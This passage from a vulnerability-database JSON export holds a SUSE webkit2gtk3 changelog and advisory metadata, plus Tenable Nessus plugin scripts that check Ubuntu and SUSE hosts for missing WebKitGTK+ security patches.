cannot be re-enabled if disabled by settings.\n - Fix seek sometimes not working.\n - Fix rendering of emojis that were using the wrong scale factor in some\n cases.\n - Fix rendering of combining enclosed keycap.\n - Fix rendering scale of some layers in HiDPI.\n - Fix a crash in Wayland when closing the web view.\n - Fix crashes upower crashes when running inside a chroot or on systems\n with broken dbus/upower.\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n - Fix several crashes and rendering issues.\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\n support.\n - Fix a crash a under Wayland when using mesa software rasterization.\n - Make fullscreen video work again.\n - Fix handling of missing GStreamer elements.\n - Fix rendering when webm video is played twice.\n - Fix kinetic scrolling sometimes jumping around.\n - Fix build with ICU configured without collation support.\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n - Show the context menu on long-press gesture.\n - Add support for Shift + mouse scroll to scroll horizontally.\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n - Implement support for Graphics ARIA roles.\n - Make sleep inhibitors work under Flatpak.\n - Add get element CSS value command to WebDriver.\n - Fix a crash aftter a swipe gesture.\n - Fix several crashes and rendering issues.\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and\n libwebkit2gtk.\n - Fix parsing of timeout values in WebDriver.\n - Implement get timeouts command in WebDriver.\n - Fix deadlock in GStreamer video sink during shutdown when accelerated\n compositing is disabled.\n - Fix several crashes and rendering issues.\n - Add web process API to detect when form is submitted via JavaScript.\n - Add new API to replace webkit_form_submission_request_get_text_fields()\n that is now deprecated.\n - Add WebKitWebView::web-process-terminated signal and deprecate\n web-process-crashed.\n - Fix rendering issues when editing text areas.\n - Use FastMalloc based GstAllocator for GStreamer.\n - Fix web process crash at startup in bmalloc.\n - Fix several memory leaks in GStreamer media backend.\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n - Fix several crashes and rendering issues.\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n - Add functions to WebSettings to convert font sizes between points and\n pixels.\n - Ensure cookie operations take effect when they happen before a web\n process has been spawned.\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n - Add initial resource load statistics support.\n - Add API to expose availability of certain editing commands in\n WebKitEditorState.\n - Add API to query whether a WebKitNavigationAction is a redirect\n or not.\n - Improve complex text rendering.\n - Add support for the &quot;system&quot; CSS font family.\n - Disable USE_GSTREAMER_GL\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "cvss3": {}, "published": "2018-10-26T00:11:58", "type": "suse", "title": "Security update for webkit2gtk3 (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2018-10-26T00:11:58", "id": "OPENSUSE-SU-2018:3473-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2022-03-27T15:44:34", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-19T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK&#43; vulnerabilities (USN-3687-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12293", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-3687-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3687-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110611);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_xref(name:\"USN\", value:\"3687-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK&#43; vulnerabilities (USN-3687-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3687-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:13:47", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2018-2075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120064", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2075-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120064);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182075-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fc09758\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2018-1401=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-1401=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:49:19", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues. This update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", 